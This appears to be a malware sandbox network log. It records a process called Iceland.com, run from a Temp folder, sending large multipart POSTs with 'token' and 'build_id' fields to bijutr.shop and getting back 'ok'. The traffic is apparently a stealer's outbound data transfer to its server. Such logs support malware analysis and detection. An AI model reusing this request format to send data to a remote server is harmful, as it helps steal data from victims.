                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              20192.168.2.449791188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----PP8Y5FC2NGV3EUS26P89
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 131557
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 59 35 46 43 32 4e 47 56 33 45 55 53 32 36 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------PP8Y5FC2NGV3EUS26P89Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------PP8Y5FC2NGV3EUS26P89Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:08 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:10 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              21192.168.2.449796188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----89RQQQIWLXBIEUAIECT2
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 6990993
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 38 39 52 51 51 51 49 57 4c 58 42 49 45 55 41 49 45 43 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 51 51 51 49 57 4c 58 42 49 45 55 41 49 45 43 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 51 51 51 49 57 4c 58 42 49 45 55 41 49 45 43 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------89RQQQIWLXBIEUAIECT2Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------89RQQQIWLXBIEUAIECT2Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------89RQQQIWLXBIEUAIECT2Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:11 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
